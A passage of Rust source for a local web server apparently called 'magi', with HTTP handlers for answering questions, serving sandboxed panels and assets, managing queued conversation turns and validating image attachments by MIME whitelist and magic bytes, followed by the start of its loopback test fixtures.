3348 let mut q = ui
3349 .questions
3350 .get(&id)
3351 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3352 if !q.status.open() {
3353 return Err(ApiError::conflict(format!(
3357 "question {} is already {}",
3358 q.short(),
3359 q.status.as_str()
3360 )));
3361 }
3362 q.answer(answer).map_err(ApiError::bad_request_from)?;
3366 ui.questions.put(&mut q)?;
3367 Ok(Json(QuestionView::from(q)))
3368 })
3369 .await
3370}
3371
3372#[derive(Debug, Deserialize)]
3374#[serde(deny_unknown_fields)]
3375struct NewSay {
3376 body: String,
3377}
3378
3379async fn question_say(
3389 State(ui): State<Arc<Ui>>,
3390 Path(id): Path<String>,
3391 body: std::result::Result<Json<NewSay>, JsonRejection>,
3392) -> ApiResult<Json<QuestionView>> {
3393 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3394 blocking(move || {
3395 let id = resolve_question(&ui.questions, &id)?;
3396 let mut q = ui
3397 .questions
3398 .get(&id)
3399 .map_err(|e| ApiError::from(e).with_status(StatusCode::INTERNAL_SERVER_ERROR))?;
3400 if !q.status.open() {
3401 return Err(ApiError::conflict(format!(
3405 "question {} is already {}",
3406 q.short(),
3407 q.status.as_str()
3408 )));
3409 }
3410 q.say(body.body).map_err(ApiError::bad_request_from)?;
3413 ui.questions.put(&mut q)?;
3414 Ok(Json(QuestionView::from(q)))
3415 })
3416 .await
3417}
3418
3419fn resolve_question(store: &Questions, id: &str) -> ApiResult<String> {
3421 if store.path_of(id).is_file() {
3422 return Ok(id.to_owned());
3423 }
3424 pick(
3425 store.list().into_iter().map(|q| q.id).collect(),
3426 id,
3427 "question",
3428 )
3429}
3430
3431async fn question_panel(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<Response> {
3446 blocking(move || {
3447 let id = resolve_question(&ui.questions, &id)?;
3448 let Some(html) = ui.questions.panel_html(&id) else {
3449 return Err(ApiError::not_found(format!("question {id} has no panel")));
3450 };
3451 Ok(panel_response(
3452 "text/html; charset=utf-8",
3453 false,
3454 html.into_bytes(),
3455 ))
3456 })
3457 .await
3458}
3459
3460async fn question_asset(
3488 State(ui): State<Arc<Ui>>,
3489 Path((id, name)): Path<(String, String)>,
3490) -> ApiResult<Response> {
3491 if !crate::ask::valid_asset_name(&name) {
3494 return Err(ApiError::bad_request(format!(
3495 "`{name}` is not a usable asset name"
3496 )));
3497 }
3498 blocking(move || {
3499 let id = resolve_question(&ui.questions, &id)?;
3500 let asset = ui
3501 .questions
3502 .panel_asset(&id, &name)
3503 .map_err(|e| ApiError::bad_request(format!("{e:#}")))?;
3504 let Some(bytes) = asset else {
3505 return Err(ApiError::not_found(format!(
3506 "question {id} has no asset `{name}`"
3507 )));
3508 };
3509 Ok(panel_response(
3510 asset_content_type(&name),
3511 is_svg(&name),
3512 bytes,
3513 ))
3514 })
3515 .await
3516}
3517
3518fn asset_content_type(name: &str) -> &'static str {
3531 match extension(name).as_deref() {
3532 Some("png") => "image/png",
3533 Some("jpg" | "jpeg") => "image/jpeg",
3534 Some("gif") => "image/gif",
3535 Some("webp") => "image/webp",
3536 Some("svg") => "image/svg+xml",
3537 Some("css") => "text/css; charset=utf-8",
3538 Some("txt") => "text/plain; charset=utf-8",
3539 _ => "application/octet-stream",
3540 }
3541}
3542
3543fn is_svg(name: &str) -> bool {
3546 extension(name).as_deref() == Some("svg")
3547}
3548
3549fn extension(name: &str) -> Option<String> {
3551 name.rsplit_once('.')
3552 .map(|(_, ext)| ext.to_ascii_lowercase())
3553}
3554
3555fn panel_response(content_type: &'static str, download: bool, body: Vec<u8>) -> Response {
3572 let mut res = (
3573 [
3574 (header::CONTENT_TYPE, content_type),
3575 (header::CONTENT_SECURITY_POLICY, PANEL_CSP),
3576 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
3577 (header::REFERRER_POLICY, "no-referrer"),
3578 ],
3579 body,
3580 )
3581 .into_response();
3582 if download {
3583 res.headers_mut().insert(
3584 header::CONTENT_DISPOSITION,
3585 HeaderValue::from_static("attachment"),
3586 );
3587 }
3588 res
3589}
3590
3591#[derive(Debug, Serialize)]
3597struct TalkView {
3598 #[serde(flatten)]
3599 talk: Talk,
3600 turn_bodies_md: Vec<Vec<md::Node>>,
3601 thinking: bool,
3609}
3610
3611impl TalkView {
3612 fn new(talk: Talk, thinking: bool) -> Self {
3613 let turn_bodies_md = talk
3614 .turns
3615 .iter()
3616 .map(|turn| md::to_nodes(&turn.body, &md::ImageBase::None))
3617 .collect();
3618 Self {
3619 turn_bodies_md,
3620 thinking,
3621 talk,
3622 }
3623 }
3624}
3625
3626#[derive(Debug, Serialize)]
3631struct TalkDetailView {
3632 #[serde(flatten)]
3633 view: TalkView,
3634 tasks: Vec<TaskView>,
3635}
3636
3637async fn talks_list(State(ui): State<Arc<Ui>>) -> ApiResult<Json<Vec<TalkView>>> {
3642 blocking(move || {
3643 Ok(Json(
3644 ui.talks
3645 .list()
3646 .into_iter()
3647 .map(|talk| {
3648 let thinking = ui.is_thinking(&talk.id);
3649 TalkView::new(talk, thinking)
3650 })
3651 .collect(),
3652 ))
3653 })
3654 .await
3655}
3656
3657#[derive(Debug, Default, Deserialize)]
3662#[serde(default)]
3663struct NewTalk {
3664 agent: Option<String>,
3665 repo: Option<PathBuf>,
3666}
3667
3668async fn talk_post(
3671 State(ui): State<Arc<Ui>>,
3672 body: std::result::Result<Json<NewTalk>, JsonRejection>,
3673) -> ApiResult<impl IntoResponse> {
3674 let body = match body {
3678 Ok(Json(body)) => body,
3679 Err(JsonRejection::MissingJsonContentType(_)) => NewTalk::default(),
3680 Err(e) => return Err(ApiError::bad_request(e.body_text())),
3681 };
3682 let repo = body.repo.clone().unwrap_or_else(|| ui.repo.clone());
3683 let cfg = config_for(&repo).await?;
3684 let view = blocking(move || {
3685 let talk = talk::begin(&ui.talks, &cfg, repo, body.agent.as_deref())?;
3686 let thinking = ui.is_thinking(&talk.id);
3687 Ok(TalkView::new(talk, thinking))
3688 })
3689 .await?;
3690 Ok((StatusCode::CREATED, Json(view)))
3691}
3692
3693async fn talk_detail(
3695 State(ui): State<Arc<Ui>>,
3696 Path(id): Path<String>,
3697) -> ApiResult<Json<TalkDetailView>> {
3698 blocking(move || {
3699 let id = resolve_talk(&ui.talks, &id)?;
3700 let talk = ui.talks.get(&id)?;
3701 let thinking = ui.is_thinking(&talk.id);
3702 let tasks = talk::tasks_of(&ui.queue, &talk.id)
3703 .into_iter()
3704 .map(TaskView::from)
3705 .collect();
3706 Ok(Json(TalkDetailView {
3707 view: TalkView::new(talk, thinking),
3708 tasks,
3709 }))
3710 })
3711 .await
3712}
3713
3714#[derive(Debug, Default, Deserialize)]
3720#[serde(default, deny_unknown_fields)]
3721struct NewTalkTurn {
3722 text: String,
3723 attachments: Vec<String>,
3724}
3725
3726#[derive(Debug, Deserialize)]
3727#[serde(deny_unknown_fields)]
3728struct EditTalkPending {
3729 text: String,
3730 expected_text: String,
3731 expected_attachments: Vec<String>,
3732}
3733
3734#[derive(Debug, Deserialize)]
3735#[serde(deny_unknown_fields)]
3736struct ClearTalkPending {
3737 expected_text: String,
3738 expected_attachments: Vec<String>,
3739}
3740
3741async fn talk_say(
3753 State(ui): State<Arc<Ui>>,
3754 Path(id): Path<String>,
3755 body: std::result::Result<Json<NewTalkTurn>, JsonRejection>,
3756) -> ApiResult<(StatusCode, Json<TalkView>)> {
3757 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
3758 if body.text.trim().is_empty() && body.attachments.is_empty() {
3759 return Err(ApiError::bad_request("say something"));
3760 }
3761
3762 let id = {
3763 let ui = Arc::clone(&ui);
3764 let asked = id.clone();
3765 blocking(move || resolve_talk(&ui.talks, &asked)).await?
3766 };
3767 {
3771 let ui = Arc::clone(&ui);
3772 let id = id.clone();
3773 blocking(move || {
3774 let talk = ui.talks.get(&id)?;
3775 if !talk.status.open() {
3776 return Err(ApiError::conflict(format!(
3777 "talk {} is {} and takes no more turns",
3778 talk.short(),
3779 talk.status.as_str()
3780 )));
3781 }
3782 Ok(())
3783 })
3784 .await?;
3785 }
3786
3787 let attachments = {
3792 let ui = Arc::clone(&ui);
3793 let id = id.clone();
3794 let ids = body.attachments.clone();
3795 blocking(move || {
3796 ids.into_iter()
3797 .map(|att_id| {
3798 ui.talks.attachment_meta(&id, &att_id)?.ok_or_else(|| {
3799 ApiError::bad_request(format!("unknown attachment `{att_id}`"))
3800 })
3801 })
3802 .collect::<ApiResult<Vec<talk::Attachment>>>()
3803 })
3804 .await?
3805 };
3806
3807 let start = {
3812 let ui = Arc::clone(&ui);
3813 let id = id.clone();
3814 blocking(move || ui.begin_talk_turn_unless_pending(&id)).await?
3815 };
3816 let turn_guard = match start {
3817 TalkTurnStart::Claimed(turn_guard) => turn_guard,
3818 TalkTurnStart::Pending => {
3819 return Err(ApiError::conflict(
3820 "a queued draft is waiting; resume it, edit it, or clear it before sending another message",
3821 ));
3822 }
3823 TalkTurnStart::Busy => {
3824 let (tx, rx) = tokio::sync::oneshot::channel();
3840 tokio::spawn({
3841 let ui = Arc::clone(&ui);
3842 let id = id.clone();
3843 let said = body.text.clone();
3844 async move {
3845 let written = blocking({
3846 let ui = Arc::clone(&ui);
3847 let id = id.clone();
3848 move || {
3849 let mut talk = ui.talks.get(&id)?;
3850 #[cfg(test)]
3855 if let Some(gate) = ui
3856 .busy_queue_gate
3857 .lock()
3858 .unwrap_or_else(PoisonError::into_inner)
3859 .take()
3860 {
3861 let _ = gate.reached.send(());
3862 let _ = gate.release.recv();
3863 }
3864 if let Err(error) =
3865 talk::queue(&mut talk, &ui.talks, &said, attachments)
3866 {
3867 if let Ok(fresh) = ui.talks.get(&id) {
3868 if !fresh.status.open() {
3869 return Err(ApiError::conflict(format!(
3870 "talk {} is {} and takes no more turns",
3871 fresh.short(),
3872 fresh.status.as_str()
3873 )));
3874 }
3875 }
3876 return Err(ApiError::from(error));
3877 }
3878 let claim = match ui.begin_queued_talk_turn(&id)? {
3889 Some(turn_guard) => {
3890 let (cfg, _) = Config::discover(&talk.repo, None)?;
3891 Some((talk.clone(), cfg, turn_guard))
3892 }
3893 None => None,
3894 };
3895 let thinking = ui.is_thinking(&id);
3896 Ok((TalkView::new(talk, thinking), claim))
3897 }
3898 })
3899 .await;
3900 let (view, reclaimed) = match written {
3901 Ok(pair) => pair,
3902 Err(e) => {
3903 let _ = tx.send(Err(e));
3908 return;
3909 }
3910 };
3911 let _ = tx.send(Ok(view));
3914 if let Some((talk, cfg, turn_guard)) = reclaimed {
3915 let talks = ui.talks.clone();
3916 drain_loop(talk, talks, cfg, id, turn_guard).await;
3917 }
3918 }
3919 });
3920 let view = rx
3921 .await
3922 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
3923 return Ok((StatusCode::ACCEPTED, Json(view)));
3924 }
3925 };
3926
3927 let (talk, cfg) = {
3928 let ui = Arc::clone(&ui);
3929 let id = id.clone();
3930 blocking(move || {
3931 let talk = ui.talks.get(&id)?;
3932 let (cfg, _) = Config::discover(&talk.repo, None)?;
3933 Ok((talk, cfg))
3934 })
3935 .await?
3936 };
3937
3938 let talks = ui.talks.clone();
3939 let (tx, rx) = tokio::sync::oneshot::channel();
3954 tokio::spawn({
3955 let ui = Arc::clone(&ui);
3956 let talks = talks.clone();
3957 let id = id.clone();
3958 let said = body.text.clone();
3959 let mut talk = talk.clone();
3960 async move {
3961 let recorded = blocking({
3962 let talks = talks.clone();
3963 move || {
3964 if let Err(error) = talk::record(&mut talk, &talks, &said, attachments) {
3965 if let Ok(fresh) = talks.get(&talk.id) {
3966 if !fresh.status.open() {
3967 return Err(ApiError::conflict(format!(
3968 "talk {} is {} and takes no more turns",
3969 fresh.short(),
3970 fresh.status.as_str()
3971 )));
3972 }
3973 }
3974 return Err(ApiError::from(error));
3975 }
3976 Ok((said.trim().to_owned(), talk))
3982 }
3983 })
3984 .await;
3985 let (text, mut talk) = match recorded {
3986 Ok(pair) => pair,
3987 Err(e) => {
3988 let _ = tx.send(Err(e));
3992 return;
3993 }
3994 };
3995 let queued = talk.clone();
3996 let thinking = ui.is_thinking(&id);
3997 let _ = tx.send(Ok((queued, thinking)));
4000
4001 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &text).await {
4002 tracing::warn!("talk {id} turn failed: {e:#}");
4006 }
4007 drain_loop(talk, talks, cfg, id, turn_guard).await;
4010 }
4011 });
4012
4013 let (queued, thinking) = rx
4014 .await
4015 .map_err(|_| ApiError::internal("the talk turn task ended without answering"))??;
4016
4017 Ok((StatusCode::ACCEPTED, Json(TalkView::new(queued, thinking))))
4019}
4020
4021async fn talk_pending_resume(
4025 State(ui): State<Arc<Ui>>,
4026 Path(id): Path<String>,
4027) -> ApiResult<(StatusCode, Json<TalkView>)> {
4028 let id = {
4029 let ui = Arc::clone(&ui);
4030 let asked = id.clone();
4031 blocking(move || resolve_talk(&ui.talks, &asked)).await?
4032 };
4033 let Some(turn_guard) = ui.begin_talk_turn(&id)? else {
4034 return Err(ApiError::conflict(
4035 "a talk turn is already running; the queued draft will be handled by it",
4036 ));
4037 };
4038 let (talk, cfg) = {
4039 let ui = Arc::clone(&ui);
4040 let id = id.clone();
4041 blocking(move || {
4042 let talk = ui.talks.get(&id)?;
4043 if !talk.status.open() {
4044 return Err(ApiError::conflict(format!(
4045 "talk {} is {} and takes no more turns",
4046 talk.short(),
4047 talk.status.as_str()
4048 )));
4049 }
4050 if talk.pending.is_empty() && talk.pending_attachments.is_empty() {
4051 return Err(ApiError::conflict("there is no queued draft to resume"));
4052 }
4053 let (cfg, _) = Config::discover(&talk.repo, None)?;
4054 Ok((talk, cfg))
4055 })
4056 .await?
4057 };
4058 let view = TalkView::new(talk.clone(), true);
4059 let talks = ui.talks.clone();
4060 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4061 Ok((StatusCode::ACCEPTED, Json(view)))
4062}
4063
4064async fn drain_loop(mut talk: Talk, talks: Talks, cfg: Config, id: String, turn: TalkTurnGuard) {
4080 let live_set = Arc::clone(&turn.turns);
4081 let mut turn = Some(turn);
4089 loop {
4090 let observed = live_set
4094 .lock()
4095 .unwrap_or_else(PoisonError::into_inner)
4096 .queued
4097 .get(&id)
4098 .copied()
4099 .unwrap_or(0);
4100 let drained = blocking({
4101 let talks = talks.clone();
4102 move || {
4103 let result = talk::drain(&mut talk, &talks);
4104 Ok((talk, result))
4105 }
4106 })
4107 .await;
4108 let (next_talk, result) = match drained {
4109 Ok(drained) => drained,
4110 Err(e) => {
4111 tracing::warn!(
4112 status = %e.status,
4113 message = %e.message,
4114 "talk {id} could not start queued-text drain"
4115 );
4116 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4117 turn.take()
4118 .expect("held for the whole loop until released here")
4119 .release(&mut live);
4120 break;
4121 }
4122 };
4123 talk = next_talk;
4124 let drained = match result {
4125 Ok(Some(drained)) => drained,
4126 Ok(None) => {
4127 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4128 if live.queued.get(&id).copied().unwrap_or(0) != observed {
4129 continue;
4130 }
4131 turn.take()
4132 .expect("held for the whole loop until released here")
4133 .release(&mut live);
4134 break;
4135 }
4136 Err(e) => {
4137 tracing::warn!("talk {id} could not drain queued text: {e:#}");
4138 let mut live = live_set.lock().unwrap_or_else(PoisonError::into_inner);
4139 turn.take()
4140 .expect("held for the whole loop until released here")
4141 .release(&mut live);
4142 break;
4143 }
4144 };
4145 if let Err(e) = talk::respond(&mut talk, &talks, &cfg, &drained).await {
4146 tracing::warn!("talk {id} turn failed: {e:#}");
4147 }
4148 }
4149}
4150
4151async fn talk_pending_clear(
4153 State(ui): State<Arc<Ui>>,
4154 Path(id): Path<String>,
4155 body: std::result::Result<Json<ClearTalkPending>, JsonRejection>,
4156) -> ApiResult<Json<TalkView>> {
4157 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4158 blocking(move || {
4159 let id = resolve_talk(&ui.talks, &id)?;
4160 let mut talk = ui.talks.get(&id)?;
4161 if !talk.status.open() {
4162 return Err(ApiError::conflict(format!(
4163 "talk {} is {} and takes no more turns",
4164 talk.short(),
4165 talk.status.as_str()
4166 )));
4167 }
4168 if !talk::clear_pending_if_matches(
4169 &mut talk,
4170 &ui.talks,
4171 &body.expected_text,
4172 &body.expected_attachments,
4173 )? {
4174 return Err(ApiError::conflict(
4175 "queued message changed; reload it before clearing",
4176 ));
4177 }
4178 let thinking = ui.is_thinking(&talk.id);
4179 Ok(Json(TalkView::new(talk, thinking)))
4180 })
4181 .await
4182}
4183
4184async fn talk_pending_edit(
4188 State(ui): State<Arc<Ui>>,
4189 Path(id): Path<String>,
4190 body: std::result::Result<Json<EditTalkPending>, JsonRejection>,
4191) -> ApiResult<Json<TalkView>> {
4192 let Json(body) = body.map_err(|e| ApiError::bad_request(e.body_text()))?;
4193 let (view, reclaimed) = blocking({
4194 let ui = Arc::clone(&ui);
4195 move || {
4196 let id = resolve_talk(&ui.talks, &id)?;
4197 let mut talk = ui.talks.get(&id)?;
4198 if !talk.status.open() {
4199 return Err(ApiError::conflict(format!(
4200 "talk {} is {} and takes no more turns",
4201 talk.short(),
4202 talk.status.as_str()
4203 )));
4204 }
4205 if !talk::edit_pending_text(
4206 &mut talk,
4207 &ui.talks,
4208 &body.text,
4209 &body.expected_text,
4210 &body.expected_attachments,
4211 )? {
4212 return Err(ApiError::conflict(
4213 "queued message changed; reload it before editing",
4214 ));
4215 }
4216 let claim = match ui.begin_queued_talk_turn(&id)? {
4217 Some(turn_guard) => {
4218 let (cfg, _) = Config::discover(&talk.repo, None)?;
4219 Some((talk.clone(), cfg, id.clone(), turn_guard))
4220 }
4221 None => None,
4222 };
4223 let thinking = ui.is_thinking(&id);
4224 Ok((TalkView::new(talk, thinking), claim))
4225 }
4226 })
4227 .await?;
4228 if let Some((talk, cfg, id, turn_guard)) = reclaimed {
4229 let talks = ui.talks.clone();
4230 tokio::spawn(drain_loop(talk, talks, cfg, id, turn_guard));
4231 }
4232 Ok(Json(view))
4233}
4234
4235async fn talk_close(
4237 State(ui): State<Arc<Ui>>,
4238 Path(id): Path<String>,
4239) -> ApiResult<Json<TalkView>> {
4240 blocking(move || {
4241 let id = resolve_talk(&ui.talks, &id)?;
4242 let mut talk = ui.talks.get(&id)?;
4243 talk::close(&mut talk, &ui.talks)?;
4244 let thinking = ui.is_thinking(&talk.id);
4245 Ok(Json(TalkView::new(talk, thinking)))
4246 })
4247 .await
4248}
4249
4250async fn talk_reopen(
4252 State(ui): State<Arc<Ui>>,
4253 Path(id): Path<String>,
4254) -> ApiResult<Json<TalkView>> {
4255 blocking(move || {
4256 let id = resolve_talk(&ui.talks, &id)?;
4257 let mut talk = ui.talks.get(&id)?;
4258 talk::reopen(&mut talk, &ui.talks)?;
4259 let thinking = ui.is_thinking(&talk.id);
4260 Ok(Json(TalkView::new(talk, thinking)))
4261 })
4262 .await
4263}
4264
4265async fn talk_delete(State(ui): State<Arc<Ui>>, Path(id): Path<String>) -> ApiResult<StatusCode> {
4275 blocking(move || {
4276 let id = resolve_talk(&ui.talks, &id)?;
4277 ui.talks.remove(&id)?;
4278 Ok(StatusCode::NO_CONTENT)
4279 })
4280 .await
4281}
4282
4283fn resolve_talk(store: &Talks, id: &str) -> ApiResult<String> {
4285 pick(store.list().into_iter().map(|t| t.id).collect(), id, "talk")
4286}
4287
4288async fn talk_attachment_post(
4291 State(ui): State<Arc<Ui>>,
4292 Path(id): Path<String>,
4293 headers: HeaderMap,
4294 body: Bytes,
4295) -> ApiResult<(StatusCode, Json<talk::Attachment>)> {
4296 let mime = validate_attachment(&headers, &body)?;
4297 let name = filename_header(&headers);
4298 let data = body.to_vec();
4299 blocking(move || {
4300 let id = resolve_talk(&ui.talks, &id)?;
4301 let att = ui.talks.put_attachment(&id, mime, &name, &data)?;
4302 Ok((StatusCode::CREATED, Json(att)))
4303 })
4304 .await
4305}
4306
4307async fn talk_attachment_get(
4310 State(ui): State<Arc<Ui>>,
4311 Path((id, att)): Path<(String, String)>,
4312) -> ApiResult<Response> {
4313 blocking(move || {
4314 let id = resolve_talk(&ui.talks, &id)?;
4315 let Some((meta, data)) = ui.talks.read_attachment(&id, &att)? else {
4316 return Err(ApiError::not_found(format!(
4317 "talk {id} has no attachment `{att}`"
4318 )));
4319 };
4320 Ok(attachment_response(&meta.mime, data))
4321 })
4322 .await
4323}
4324
4325fn validate_attachment(headers: &HeaderMap, data: &[u8]) -> ApiResult<&'static str> {
4336 if data.len() > ATTACHMENT_MAX_BYTES {
4337 return Err(ApiError::bad_request(format!(
4338 "attachment is {} bytes, over the {} MiB limit",
4339 data.len(),
4340 ATTACHMENT_MAX_BYTES / (1024 * 1024)
4341 ))
4342 .with_status(StatusCode::PAYLOAD_TOO_LARGE));
4343 }
4344 if data.is_empty() {
4345 return Err(ApiError::bad_request("attachment is empty"));
4346 }
4347 let declared = declared_mime(headers)?;
4348 match sniffed_mime(data) {
4349 Some(sniffed) if sniffed == declared => Ok(declared),
4350 Some(sniffed) => Err(ApiError::bad_request(format!(
4351 "Content-Type said `{declared}` but the file's own bytes look like `{sniffed}`"
4352 ))),
4353 None => Err(ApiError::bad_request(
4354 "the file's bytes do not match any accepted image format",
4355 )),
4356 }
4357}
4358
4359fn declared_mime(headers: &HeaderMap) -> ApiResult<&'static str> {
4363 let raw = headers
4364 .get(header::CONTENT_TYPE)
4365 .and_then(|v| v.to_str().ok())
4366 .unwrap_or("")
4367 .split(';')
4368 .next()
4369 .unwrap_or("")
4370 .trim()
4371 .to_ascii_lowercase();
4372 ATTACHMENT_MIME_WHITELIST
4373 .iter()
4374 .find(|&&m| m == raw)
4375 .copied()
4376 .ok_or_else(|| {
4377 if raw == "image/svg+xml" {
4378 ApiError::bad_request(
4379 "SVG is not accepted: it can carry active content (e.g. a <script>), \
4380 not just a picture",
4381 )
4382 } else if raw.is_empty() {
4383 ApiError::bad_request("Content-Type is required for an attachment upload")
4384 } else {
4385 ApiError::bad_request(format!(
4386 "`{raw}` is not an accepted attachment type; use image/png, image/jpeg, \
4387 image/gif or image/webp"
4388 ))
4389 }
4390 })
4391}
4392
4393fn sniffed_mime(data: &[u8]) -> Option<&'static str> {
4396 if data.starts_with(b"\x89PNG\r\n\x1a\n") {
4397 Some("image/png")
4398 } else if data.starts_with(b"\xff\xd8\xff") {
4399 Some("image/jpeg")
4400 } else if data.starts_with(b"GIF87a") || data.starts_with(b"GIF89a") {
4401 Some("image/gif")
4402 } else if data.len() >= 12 && &data[0..4] == b"RIFF" && &data[8..12] == b"WEBP" {
4403 Some("image/webp")
4404 } else {
4405 None
4406 }
4407}
4408
4409fn filename_header(headers: &HeaderMap) -> String {
4415 headers
4416 .get(FILENAME_HEADER)
4417 .and_then(|v| v.to_str().ok())
4418 .map(str::trim)
4419 .filter(|s| !s.is_empty())
4420 .unwrap_or("attachment")
4421 .to_owned()
4422}
4423
4424fn attachment_response(mime: &str, body: Vec<u8>) -> Response {
4431 let content_type = ATTACHMENT_MIME_WHITELIST
4432 .iter()
4433 .find(|&&m| m == mime)
4434 .copied()
4435 .unwrap_or("application/octet-stream");
4436 (
4437 [
4438 (header::CONTENT_TYPE, content_type),
4439 (header::X_CONTENT_TYPE_OPTIONS, "nosniff"),
4440 ],
4441 body,
4442 )
4443 .into_response()
4444}
4445
4446async fn config_for(repo: &FsPath) -> ApiResult<Config> {
4454 let repo = repo.to_path_buf();
4455 blocking(move || {
4456 let (cfg, _) = Config::discover(&repo, None)?;
4457 Ok(cfg)
4458 })
4459 .await
4460}
4461
4462fn pick(ids: Vec<String>, prefix: &str, what: &str) -> ApiResult<String> {
4468 let mut hits = ids
4469 .into_iter()
4470 .filter(|id| id.starts_with(prefix) || id.ends_with(prefix));
4471 match (hits.next(), hits.next()) {
4472 (Some(one), None) => Ok(one),
4473 (None, _) => Err(ApiError::not_found(format!("no {what} matches `{prefix}`"))),
4474 (Some(a), Some(b)) => Err(ApiError::bad_request(format!(
4475 "`{prefix}` matches more than one {what}, including {a} and {b}"
4476 ))),
4477 }
4478}
4479
4480#[cfg(test)]
4481mod tests {
4482 use pretty_assertions::assert_eq;
4483 use serde_json::Value;
4484 use tempfile::TempDir;
4485 use tokio::io::{AsyncReadExt as _, AsyncWriteExt as _};
4486
4487 use super::*;
4488 use crate::config::Config;
4489 use crate::queue::{Source, TaskStatus};
4490
4491 const SETTLE_STEPS: usize = 3_000;
4502
4503 struct Fixture {
4509 home: TempDir,
4510 addr: SocketAddr,
4511 }
4512
4513 impl Fixture {
4514 async fn start() -> Self {
4515 Self::with_loop(launch_idle).await
4516 }
4517
4518 async fn with_loop(launch: Launch) -> Self {
4520 let home = TempDir::new().expect("temp home");
4521 let addr = Self::serve(home.path(), PathBuf::from("/repo/magi"), launch).await;
4522 Self { home, addr }
4523 }
4524
4525 async fn with_repo(repo: PathBuf) -> Self {
4529 let home = TempDir::new().expect("temp home");
4530 let addr = Self::serve(home.path(), repo, launch_idle).await;
4531 Self { home, addr }
4532 }
4533
4534 async fn serve(home: &FsPath, repo: PathBuf, launch: Launch) -> SocketAddr {
4535 let queue = Queue::at(home.join("queue"));
4536 let runs = home.join("runs");
4537 std::fs::create_dir_all(&runs).expect("runs dir");
4538 let worktrees = home.join("wt").join("magi");
4539 std::fs::create_dir_all(&worktrees).expect("worktrees dir");
4540 let ui = Ui::new(
4541 queue,
4542 Questions::at(home.join("questions")),
4543 Talks::at(home.join("talks")),
4544 runs,
4545 home.to_path_buf(),
4546 repo,
4547 )
4548 .with_worktrees_root(worktrees)
4549 .with_launch(launch);
4550 let listener = tokio::net::TcpListener::bind((Ipv4Addr::LOCALHOST, 0))
4551 .await
4552 .expect("bind loopback");
4553 let addr = listener.local_addr().expect("local addr");
4554 tokio::spawn(async move {
4555 let _ = axum::serve(listener, ui.router()).await;
4556 });
4557 addr
4558 }
4559
4560 fn queue(&self) -> Queue {
4561 Queue::at(self.home.path().join("queue"))
4562 }
4563
4564 fn questions(&self) -> Questions {
4565 Questions::at(self.home.path().join("questions"))
4566 }
4567
4568 fn talks(&self) -> Talks {
4569 Talks::at(self.home.path().join("talks"))
4570 }
4571
4572 fn runs(&self) -> PathBuf {
4573 self.home.path().join("runs")
4574 }
4575
4576 async fn get(&self, path: &str) -> Res {
4577 request(self.addr, "GET", path, None).await
4578 }
4579
4580 async fn head(&self, path: &str) -> Res {
4585 request(self.addr, "HEAD", path, None).await
4586 }
4587
4588 async fn post(&self, path: &str, body: Option<&str>) -> Res {
4589 request(self.addr, "POST", path, body).await
4590 }
4591
4592 async fn get_with(&self, path: &str, extra: &[(&str, &str)]) -> Res {
4593 request_with(self.addr, "GET", path, None, extra).await
4594 }
4595
4596 async fn delete(&self, path: &str) -> Res {
4597 request(self.addr, "DELETE", path, None).await
4598 }
4599
4600 async fn post_bytes(&self, path: &str, headers: &[(&str, &str)], body: &[u8]) -> Res {
4602 request_bytes(self.addr, path, headers, body).await
4603 }
4604 }
4605
4606 struct Res {
4607 status: u16,
4608 headers: String,
4609 head: String,
4614 body: String,
4615 bytes: Vec<u8>,
4619 }
4620
4621 impl Res {
4622 fn json(&self) -> Value {
4623 serde_json::from_str(&self.body)
4624 .unwrap_or_else(|e| panic!("body is not json ({e}): {}", self.body))
4625 }
4626
4627 fn header(&self, name: &str) -> Option<&str> {
4629 self.head.lines().find_map(|line| {
4630 let (key, value) = line.split_once(':')?;
4631 key.trim()
4632 .eq_ignore_ascii_case(name)
4633 .then(|| value.trim_start().trim_end_matches('\r'))
4634 })
4635 }
4636 }
4637
4638 async fn request(addr: SocketAddr, method: &str, path: &str, body: Option<&str>) -> Res {
4641 request_with(addr, method, path, body, &[]).await
4642 }
4643
4644 async fn request_with(
4648 addr: SocketAddr,
4649 method: &str,
4650 path: &str,
4651 body: Option<&str>,
4652 extra: &[(&str, &str)],
4653 ) -> Res {
4654 let mut head = format!("{method} {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4655 for (name, value) in extra {
4656 head.push_str(&format!("{name}: {value}\r\n"));
4657 }
4658 if let Some(body) = body {
4659 head.push_str("Content-Type: application/json\r\n");
4660 head.push_str(&format!("Content-Length: {}\r\n", body.len()));
4661 }
4662 head.push_str("\r\n");
4663 if let Some(body) = body {
4664 head.push_str(body);
4665 }
4666 let mut socket = tokio::net::TcpStream::connect(addr)
4667 .await
4668 .expect("connect to the test server");
4669 socket
4670 .write_all(head.as_bytes())
4671 .await
4672 .expect("write request");
4673 let mut raw = Vec::new();
4674 socket.read_to_end(&mut raw).await.expect("read response");
4675 let split = raw
4678 .windows(4)
4679 .position(|w| w == b"\r\n\r\n")
4680 .expect("a header block");
4681 let head = String::from_utf8_lossy(&raw[..split]).into_owned();
4682 let bytes = raw[split + 4..].to_vec();
4683 let status = head
4684 .lines()
4685 .next()
4686 .and_then(|line| line.split_whitespace().nth(1))
4687 .and_then(|code| code.parse().ok())
4688 .expect("a status line");
4689 Res {
4690 status,
4691 headers: head.to_lowercase(),
4692 head,
4693 body: String::from_utf8_lossy(&bytes).into_owned(),
4694 bytes,
4695 }
4696 }
4697
4698 async fn request_bytes(
4704 addr: SocketAddr,
4705 path: &str,
4706 headers: &[(&str, &str)],
4707 body: &[u8],
4708 ) -> Res {
4709 let mut head = format!("POST {path} HTTP/1.1\r\nHost: magi\r\nConnection: close\r\n");
4710 for (name, value) in headers {
4711 head.push_str(&format!("{name}: {value}\r\n"));
4712 }
4713 head.push_str(&format!("Content-Length: {}\r\n\r\n", body.len()));
4714 let mut socket = tokio::net::TcpStream::connect(addr)
4715 .await
4716 .expect("connect to the test server");
4717 socket
4718 .write_all(head.as_bytes())
